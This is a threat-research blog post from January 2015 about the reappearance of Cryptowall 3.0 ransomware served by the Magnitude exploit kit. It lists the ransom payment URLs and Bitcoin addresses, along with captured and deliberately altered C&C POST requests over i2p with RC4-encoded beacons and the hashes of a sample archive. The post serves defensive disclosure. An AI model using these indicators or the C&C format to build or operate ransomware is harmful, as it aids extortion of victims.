2015-01-13 - Landscape

Guess who's back again ? Cryptowall 3.0

Help_Decrypt.html Title

Exactly one month since last Cryptowall binary. Can we say goodbye ?
— kafeine (@kafeine) December 18, 2014

(If i am wrong that last itw Cryptowall 2.0 sample is from 2014-11-18 please contact me. I'd be happy to fix)

And almost two months after last sample....the reply is sadly no.

Today :

Magnitude : 2015-01-13
One payload only (which does not happen that often)

And here is what i saw in the Network quarantine (and later everywhere it could find files to encrypt)

Cryptowall - French instructions.
3.0

Here in English from another infection (Note: you'll get the png image with translation that fit your geoloc IP).

One bunch of Links :
http://paytoc4gtpn5czl2.torforall.com/1c3L59z
http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

The Decrypt 1 file for free is still here (yep...this option did not appear with CoinVault ;) )

Cryptowall Decrypt Service.

Bitcoin Address I saw (same infection vector) :
15qZLHkcgGnqaBByno2nq6ufa1og3PjnxU
1JYYzNHDaGC7noiE4eKatuYA4AThqVocDd

Uses those services to get external IP:

"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"

It seems communication with the C&C are Rc4 encoded (key seems to be alphanum sorted path of the POST ) and using i2p protocol :

Cryptowall 3.0 communications with C&C
(pcap by @Horgh_RCE)

--------------Slightly Edited-------
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p

v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c
---------------Slightly Edited-------
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p

z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
--------------------------------------------------

Which decrypted is : (don't try with the previous data...some hexa were modified (letter changed) on purpose)

z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

But wait...if you are lucky (or not :) ) here is what you may see on the Decrypt service :

Error on the Decrypt Service. It seems this service chain Tor and i2p.
Service i2p :
http://decrypt-service.i2p/decrypt_service_ejakdanrmv8ka4jak2a5jfdn/vRRRbw

"Сайт I2P недоступен. Возможно, он отключен, сеть перегружена или ваш маршрутизатор недостаточно интегрирован с другими узлами. Вы можете повторить операцию."

Google says :

"I2P website is unavailable. Perhaps he is disabled, the network is congested or your router is not well integrated with other nodes. You can repeat the operation."

So...they are sadly back..and we can expect a lot of them in Exploit Kit, Spam, tasks in Botnet etc....

Files: Cryptowall_3.0.zip Contains : 6c3e6143ab699d6b78551d417c0a1a45 and 47363b94cee907e2b8926c1be61150c7

Thanks : @Horgh_RCE for all the reversing work

Post Publication Reading :Crowti update - CryptoWall 3.0 - 2015-01-13 - Marianne Mallen - Microsoft (MMPC)